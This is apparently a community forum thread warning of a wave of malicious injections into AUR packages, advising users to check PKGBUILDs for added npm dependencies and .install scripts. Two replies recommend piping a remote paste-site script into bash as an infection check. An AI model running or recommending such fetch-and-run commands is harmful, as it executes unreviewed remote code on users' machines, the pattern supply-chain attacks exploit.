Attack wave on AUR packages!

1

I got this message from Garuda forum…

Just as a heads-up, we are aware of the wave of current injections of malicious content in AUR packages.

Our security measures in chaotic-aur are working perfectly so far and have already prevented a few of them from getting deployed.

Please be extra careful when updating packages directly from AUR in the coming days! Especially watch out for the addition of an npm dependency and an additional .install script in PKGBUILDs.

Also see this post for more context:

3 Likes
2

How to check if infected package is installed

curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash
2 Likes
3

Thanks for this @muzqs , I was just about to suggest this one too

curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash

Checking for infected AUR packages (494 total)…

Clean: None of the known infected packages were installed within 48 hours of the campaign.

You can also run pacman -Qm and check manually the PKGBUILD files if you’re extra concerned about the malware attack

2 Likes
4

image
image867×701 63.8 KB

1 Like
5